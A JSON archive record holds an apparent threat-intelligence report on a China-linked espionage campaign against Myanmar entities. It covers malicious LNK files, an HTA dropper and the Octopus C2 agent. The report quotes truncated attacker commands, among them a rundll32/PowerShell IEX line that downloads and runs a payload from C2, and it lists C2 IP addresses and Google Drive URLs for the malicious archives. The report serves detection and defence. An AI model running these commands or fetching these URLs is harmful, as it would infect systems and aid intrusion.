{
	"id": "0d5b5c93-941e-4626-9f41-9491642202e9",
	"created_at": "2026-04-06T00:14:37.896735Z",
	"updated_at": "2026-04-10T03:36:33.796656Z",
	"deleted_at": null,
	"sha1_hash": "aac28257e587e06f75001e41e26e0e8214994030",
	"title": "Unknown China-Based APT Targeting Myanmarese Entities",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2925475,
	"plain_text": "Unknown China-Based APT Targeting Myanmarese Entities\r\nBy Anomali Threat Research\r\nArchived: 2026-04-02 11:52:51 UTC\r\nThe malicious activity identified by Anomali Threat Research appears to align with techniques that would be used\r\nby a China-based group. Following the Belt and Road Initiative can often result in identifying malicious activity\r\nthat coincides with China-based groups’ Tactics, Techniques, and Procedures (TTPs).\r\nOverviewTargetingTechnical AnalysisConclusionIOCsEndnotes\r\nhttps://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z\r\nPage 1 of 9\n\nAuthored by: Parthiban Rajendran and Gage Mele\r\nInformation cutoff date: 6/19/2020\r\nOverview\r\nAnomali Threat Research has identified malicious activity targeting entities based in Myanmar (Burma) that\r\nappears to have begun in March 2020; this is based on file names and payload compilation times. An unidentified\r\nAdvanced Persistent Threat (APT), very likely China-based, is distributing Windows Shortcut (LNK) files that are\r\nbeing renamed and distributed to multiple targets, likely via spearphishing. Anomali Threat Research found these\r\nLNK files located inside multiple, uniquely-named RAR, TGZ, and ZIP files. The RAR and ZIP files are hosted\r\nhttps://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z\r\nPage 2 of 9\n\non Google Drive, this is very likely a tactic to avoid antivirus detection. The group uses the PowerShell-based,\r\nRed Teaming tool Octopus for Command and Control (C2) communication.\r\nIn addition, Anomali Threat Research found that the LNK file closely resembles the one used by the China-based\r\nAPT, Mustang Panda. 
Anomali Threat Research does not believe that this group is responsible for this activity.\r\nThis similarity may potentially indicate a sharing of tools, which is common amongst some state-sponsored\r\ngroups, or perhaps a similar tool that is used to target specific geographic regions. At the time of this writing,\r\nAnomali Threat Research cannot attribute this APT activity to any specific group. The renamed LNK files are\r\nshown in Table 1 below.\r\nTargeting\r\nChina-sponsored APT groups are known to target countries in which the government of the People’s Republic of\r\nChina is investing as part of its Belt and Road Initiative. This has also been observed in Anomali Threat\r\nResearch analysis of the China-based APT, Mustang Panda. China and Myanmar (Burma) have had multiple\r\ninstances of economic activity and agreements in 2020, as of this writing, and the two countries share a complex\r\nhistory that often resulted in conflict.[1] In January 2020, President Xi Jinping visited Myanmar and State\r\nCounselor Aung San Suu signed 33 agreements concerning projects as part of the Belt and Road Initiative.[2]\r\nChina is also one of the largest investors in Myanmar, accounting for a quarter of all Myanmar’s investment, and\r\nis Myanmar’s largest export partner.[3] Anomali Threat Research believes that, because of these economic factors,\r\nin addition to file names and compilation times, similar malicious functionality to previously-attributed China-based groups, and geographic location of potential targets, this activity very likely originates from a China-based source.\r\nPotentially-Targeted Entities\r\nThese possible targets are based specifically on file names identified by Anomali Threat Research.\r\nMyanmar Police Force (MPF)\r\nNational Crisis Management Center (NCMC)\r\nNational League for Democracy (NLD)\r\nOffice of Chief of Military Security Affairs (OCMSA)\r\nThe economic activity between China and Myanmar that is of particular 
interest to Anomali Threat Research is the\r\ninvestment by the Myanmar Yatai International Holding Group, a subsidiary of China’s Yatai Group, into the\r\ndevelopment of 25.5 acres in Kayin State, Myanmar.[4] There are dubious details concerning the urban\r\ndevelopment in the acreage near the Thailand border, which was approved by the Myanmar Investment\r\nCommission, and discussed by a director of Myanmar’s Directorate of Investment Company Administration\r\n(DICA), who confirmed the land was for 59 villas in three years.[5] In early-March 2020, the Myanmar Yatai\r\nInternational Holding Group claimed that the first phase of development covered 214 acres, instead of the 25.5\r\nacres approved by the government in an area controlled by Kayin State.[6] The claim in March 2020 may be a\r\npotential catalyst, or purposeful alignment, for this campaign.\r\nTable 1 - Renamed LNKs Located inside RAR or ZIP\r\nFile Name MD5\r\nocmsa[2020]report.rar 916b26f22658ce252531bb4ea43ef4cf\r\nHtoo 2 army research (Mpf 29-03-2020).zip 75b72340d6988ac262cabf923e548952\r\nocmsa Htoo 2 army research (Mpf 29-03-2020).rar 1f89a9d077a9712e6d227ef3cb1faac9\r\nocmsa[30-03-2020].zip 9e1f7e35fb3ae292f478d346d076c274\r\nTechnical Analysis\r\nThreat actors are very likely distributing spearphishing emails with links to download an attachment from Google\r\nDrive. Utilizing Google Drive is a known tactic used by actors to prevent antivirus and security scanners from\r\nidentifying the malicious files. Once a user navigates to the Drive URL, a ZIP or RAR file that contains a\r\nweaponized Windows Shortcut file will be downloaded on the target host. 
The LNK file utilized in the campaign\r\ncontains an embedded HTA file with VBScript that, once executed, will drop and run an executable in the\r\nbackground and communicate with the Command and Control (C2).\r\nLNK File Analysis\r\nOnce the user opens the LNK file, the below command gets executed. The command looks for a file whose name matches\r\n*2020*.LNK and proceeds to execute it via mshta.exe.\r\nCommand\r\n /c for %x in (%temp%=%cd%) do for /f \"delims==\" %i in ('dir /s /b \"%x *2020*.LNK\"') do start %TEMP:~\r\nAfter the command execution, it writes an executable named f.exe in the “C:userspublic.exe” directory. The file\r\nf.exe is then executed using Windows Management Instrumentation (WMI) in a hidden window via WMI Tasks.\r\nFigure 2 - Screenshot of the LNK file\r\nIt is worth noting that the LNK file with an embedded HTA file is very similar to Mustang Panda’s initial dropper;\r\nhowever, Anomali Threat Research could not attribute this activity to the group.\r\nThe executable f.exe uses the Living off the Land (LOLbin) technique to launch cmd.exe via the\r\nShellExec_RunDLL function. The below command uses PowerShell to download and execute the second stage\r\npayload from the C2 server.\r\n \"C:\\Windows\\System32\\rundll32.exe\" SHELL32.DLL,ShellExec_RunDLL \"cmd.exe\" \"/c powershell IEX (New-Objec\r\nThe downloaded file index is a PowerShell script that was found to be a publicly available Octopus C2\r\nframework agent as shown in Figure 3.[7]\r\nFigure 3 - Octopus C2 agent comparison\r\nThe Octopus agent fingerprints the host and sends the collected information back to C2 as part of the encrypted\r\nHTTP header as shown in Figure 4. 
The Octopus agent can be used to download further payloads or perform\r\nadditional activity on the infected host.\r\nFigure 4 - Snippet of the Octopus agent code\r\nNetwork Pivoting for Additional Samples\r\n193.29.59[.]130\r\nUsing the IP address 193.29.59[.]130 as a pivot point, Anomali Threat Research was able to find a new sample\r\nnamed D0CX_OCMSA Russia Army Weppon Ferrence to Thailand Archive.exe from Hybrid-analysis.com as\r\nshown in Figure 5.\r\nFigure 5 - Screenshot of Newly Identified Sample\r\nThe sample communicates with two C2 IP addresses as shown in Figure 6.\r\n23.106.122.234\r\n193.29.59.130\r\nFigure 6 - Newly Observed C2 IP Address\r\n23.106.122.234\r\nUpon pivoting using the IP address 23.106.122.234, Anomali Threat Research was able to identify the\r\nPowerShell-based Octopus agent from the C2 server as shown in Figure 7 below.\r\nFigure 7 - Newly Identified Samples Communicating to 23.106.122.234\r\nPivoting via Compilation Timestamp\r\nIn order to find more samples from the campaign, Anomali Threat Research used the compilation timestamp from\r\none of the identified samples 6a1611c1bd34fa3878617ef2905b1d87 which was compiled on\r\n2020-03-10 07:54:26 and shown in Table 2 below.\r\nTable 2 -\r\nFile Name MD5 Compilation Timestamp\r\nNo file name observed 4cf56653f28ccd03a78213f0b4cb0075 2020-03-10 07:54:26\r\nList Of Maf President Commander in Chief with NLD Election.Exe fd82b2a1b6479de8e1949c72401c1328 2020-03-10 07:54:26\r\norder545.exe a086fae1cd2a1074ee489535169f1b79 2020-03-10 07:54:26\r\nConclusion\r\nThe malicious activity identified by Anomali Threat Research appears to align with techniques that would be used\r\nby a China-based group. 
Following the Belt and Road Initiative can often result in identifying malicious activity\r\nthat coincides with China-based groups’ Tactics, Techniques, and Procedures (TTPs). The specificity in file names\r\nassociated with Myanmarese entities, similar LNK functionality to known China-sponsored APTs, as well as\r\neconomic and geographical factors, lead Anomali Threat Research to believe that a China-based APT is responsible\r\nfor this campaign.\r\nIOCs\r\nThe RAR and ZIP files are downloaded from Google Drive.\r\nFile Name Download URL\r\nocmsa[2020]report.rar https://drive.google.com/u/0/uc?id=1WWpgJMZce_yeQd2q5i1z1vUu7_d1rulX\u0026export=download\r\nocmsa Htoo 2 army research (Mpf 29-03-2020).rar https://drive.google.com/u/0/uc?id=1WWpgJMZce_yeQd2q5i1z1vUu7_d1rulX\u0026export=download\r\nEndnotes\r\n[1] Thu Thu Aung and Poppy McPherson, “Myanmar, China ink deals to accelerate Belt and Road as Xi courts 
an\r\nisolated Suu Kyi,” Reuters, accessed June 18, 2020, published January 18, 2020,\r\nhttps://www.reuters.com/article/us-myanmar-china/myanmar-china-ink-deals-to-accelerate-belt-and-road-as-xi-courts-an-isolated-suu-kyi-idUSKBN1ZH054; Marvin C. Ott, “Myanmar in China’s Embrace,” Foreign Policy\r\nInstitute: Asia Program, accessed June 18, 2020, published January 24, 2020,\r\nhttps://www.fpri.org/article/2020/01/myanmar-in-chinas-embrace/; Laura Zhou, “China sees Myanmar as stepping\r\nstone to Indian Ocean, energy security,” South China Morning Post, accessed June 18, 2020, published January\r\n15, 2020, https://www.scmp.com/news/china/diplomacy/article/3046218/china-sees-myanmar-stepping-stone-indian-ocean-energy-security; Sai Wanna, “Myanmar military accused ethnic Karen armed group of violating\r\ntruce,” Myanmar Times, accessed June 18, 2020, published May 21, 2020,\r\nhttps://www.mmtimes.com/news/myanmar-military-accuses-ethnic-karen-armed-group-violating-truce.html.\r\n[2] Thu Thu Aung and Poppy McPherson, “Myanmar, China ink deals to accelerate Belt and Road as Xi courts an\r\nisolated Suu Kyi,” Reuters.\r\n[3] Bloomberg, “Myanmar warns sanctions over Rohingya genocide will push it closer to China and dismisses\r\n‘debt trap’ concerns,” South China Morning Post, accessed June 18, 2020, published January 27, 2020,\r\nhttps://www.scmp.com/news/asia/southeast-asia/article/3047736/myanmar-warns-world-sanctions-over-rohingya-genocide-will; Central Intelligence Agency, “EAST ASIA/SOUTHEAST ASIA :: BURMA,” The World Factbook,\r\naccessed June 19, 2020, https://www.cia.gov/library/publications/the-world-factbook/geos/bm.html.\r\n[4] Nan Lwin, “Myanmar Govt to Probe Contentious Chinese Development on Thai Border,” The Irrawaddy,\r\naccessed June 18, 2020, published June 16, 2020, 
https://www.irrawaddy.com/news/burma/myanmar-govt-probe-contentious-chinese-development-thai-border.html.\r\n[5] “INSPECTION OF MYANMAR YATAI INTERNATIONAL HOLDING CO., LTD. AND APEX RUBBER\r\nCO., LTD,” Director of Investment and Company Administration, accessed June 18, 2020, published June 26,\r\n2019; Nyien Nyien, “Chinese Developer’s Grand Claims Spark Fresh Concern in Karen State,” The Irrawaddy,\r\naccessed June 18, 2020, published March 6, 2019, https://www.irrawaddy.com/news/burma/chinese-developers-grand-claims-spark-fresh-concern-karen-state.html.\r\n[6] Nyien Nyien, “Chinese Developer’s Grand Claims Spark Fresh Concern in Karen State,” The Irrawaddy.\r\n[7] Octopus, accessed June 19, 2020, https://github.com/mhaskar/Octopus/blob/master/agents/agent.ps1.oct.\r\nSource: https://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.anomali.com/blog/unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z"
	],
	"report_names": [
		"unknown-china-based-apt-targeting-myanmarese-entities#When:14:00:00Z"
	],
	"threat_actors": [
		{
			"id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0",
			"created_at": "2022-10-25T15:50:23.710403Z",
			"updated_at": "2026-04-10T02:00:05.281246Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"Whisper Spider"
			],
			"source_name": "MITRE:Silence",
			"tools": [
				"Winexe",
				"SDelete"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c91e335e-42be-48d9-96b5-ba56749a723b",
			"created_at": "2022-10-25T16:07:23.458346Z",
			"updated_at": "2026-04-10T02:00:04.616481Z",
			"deleted_at": null,
			"main_name": "CIA",
			"aliases": [
				"Central Intelligence Agency"
			],
			"source_name": "ETDA:CIA",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b69037ec-2605-4de4-bb32-a20d780a8406",
			"created_at": "2023-01-06T13:46:38.790766Z",
			"updated_at": "2026-04-10T02:00:03.101635Z",
			"deleted_at": null,
			"main_name": "MUSTANG PANDA",
			"aliases": [
				"Stately Taurus",
				"LuminousMoth",
				"TANTALUM",
				"Twill Typhoon",
				"TEMP.HEX",
				"Earth Preta",
				"Polaris",
				"BRONZE PRESIDENT",
				"HoneyMyte",
				"Red Lich",
				"TA416"
			],
			"source_name": "MISPGALAXY:MUSTANG PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7",
			"created_at": "2025-03-29T02:05:20.764715Z",
			"updated_at": "2026-04-10T02:00:03.851829Z",
			"deleted_at": null,
			"main_name": "GOLD WYMAN",
			"aliases": [
				"Silence "
			],
			"source_name": "Secureworks:GOLD WYMAN",
			"tools": [
				"Silence"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6daadf00-952c-408a-89be-aa490d891743",
			"created_at": "2025-08-07T02:03:24.654882Z",
			"updated_at": "2026-04-10T02:00:03.645565Z",
			"deleted_at": null,
			"main_name": "BRONZE PRESIDENT",
			"aliases": [
				"Earth Preta ",
				"HoneyMyte ",
				"Mustang Panda ",
				"Red Delta ",
				"Red Lich ",
				"Stately Taurus ",
				"TA416 ",
				"Temp.Hex ",
				"Twill Typhoon "
			],
			"source_name": "Secureworks:BRONZE PRESIDENT",
			"tools": [
				"BlueShell",
				"China Chopper",
				"Claimloader",
				"Cobalt Strike",
				"HIUPAN",
				"ORat",
				"PTSOCKET",
				"PUBLOAD",
				"PlugX",
				"RCSession",
				"TONESHELL",
				"TinyNote"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "88e53203-891a-46f8-9ced-81d874a271c4",
			"created_at": "2022-10-25T16:07:24.191982Z",
			"updated_at": "2026-04-10T02:00:04.895327Z",
			"deleted_at": null,
			"main_name": "Silence",
			"aliases": [
				"ATK 86",
				"Contract Crew",
				"G0091",
				"TAG-CR8",
				"TEMP.TruthTeller",
				"Whisper Spider"
			],
			"source_name": "ETDA:Silence",
			"tools": [
				"EDA",
				"EmpireDNSAgent",
				"Farse",
				"Ivoke",
				"Kikothac",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Meterpreter",
				"ProxyBot",
				"ReconModule",
				"Silence.Downloader",
				"TiniMet",
				"TinyMet",
				"TrueBot",
				"xfs-disp.exe"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "9baa7519-772a-4862-b412-6f0463691b89",
			"created_at": "2022-10-25T15:50:23.354429Z",
			"updated_at": "2026-04-10T02:00:05.310361Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Mustang Panda",
				"TA416",
				"RedDelta",
				"BRONZE PRESIDENT",
				"STATELY TAURUS",
				"FIREANT",
				"CAMARO DRAGON",
				"EARTH PRETA",
				"HIVE0154",
				"TWILL TYPHOON",
				"TANTALUM",
				"LUMINOUS MOTH",
				"UNC6384",
				"TEMP.Hex",
				"Red Lich"
			],
			"source_name": "MITRE:Mustang Panda",
			"tools": [
				"CANONSTAGER",
				"STATICPLUGIN",
				"ShadowPad",
				"TONESHELL",
				"Cobalt Strike",
				"HIUPAN",
				"Impacket",
				"SplatCloak",
				"PAKLOG",
				"Wevtutil",
				"AdFind",
				"CLAIMLOADER",
				"Mimikatz",
				"PUBLOAD",
				"StarProxy",
				"CorKLOG",
				"RCSession",
				"NBTscan",
				"PoisonIvy",
				"SplatDropper",
				"China Chopper",
				"PlugX"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ee03999-5432-4a65-a850-c543b4fefc3d",
			"created_at": "2022-10-25T16:07:23.882813Z",
			"updated_at": "2026-04-10T02:00:04.776949Z",
			"deleted_at": null,
			"main_name": "Mustang Panda",
			"aliases": [
				"Bronze President",
				"Camaro Dragon",
				"Earth Preta",
				"G0129",
				"Hive0154",
				"HoneyMyte",
				"Mustang Panda",
				"Operation SMUGX",
				"Operation SmugX",
				"PKPLUG",
				"Red Lich",
				"Stately Taurus",
				"TEMP.Hex",
				"Twill Typhoon"
			],
			"source_name": "ETDA:Mustang Panda",
			"tools": [
				"9002 RAT",
				"AdFind",
				"Agent.dhwf",
				"Agentemis",
				"CHINACHOPPER",
				"China Chopper",
				"Chymine",
				"ClaimLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"DCSync",
				"DOPLUGS",
				"Darkmoon",
				"Destroy RAT",
				"DestroyRAT",
				"Farseer",
				"Gen:Trojan.Heur.PT",
				"HOMEUNIX",
				"Hdump",
				"HenBox",
				"HidraQ",
				"Hodur",
				"Homux",
				"HopperTick",
				"Hydraq",
				"Impacket",
				"Kaba",
				"Korplug",
				"LadonGo",
				"MQsTTang",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"NBTscan",
				"NetSess",
				"Netview",
				"Orat",
				"POISONPLUG.SHADOW",
				"PUBLOAD",
				"PVE Find AD Users",
				"PlugX",
				"Poison Ivy",
				"PowerView",
				"QMAGENT",
				"RCSession",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Sogu",
				"TIGERPLUG",
				"TONEINS",
				"TONESHELL",
				"TVT",
				"TeamViewer",
				"Thoper",
				"TinyNote",
				"WispRider",
				"WmiExec",
				"XShellGhost",
				"Xamtrav",
				"Zupdax",
				"cobeacon",
				"nbtscan",
				"nmap",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434477,
	"ts_updated_at": 1775792193,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/aac28257e587e06f75001e41e26e0e8214994030.pdf",
		"text": "https://archive.orkl.eu/aac28257e587e06f75001e41e26e0e8214994030.txt",
		"img": "https://archive.orkl.eu/aac28257e587e06f75001e41e26e0e8214994030.jpg"
	}
}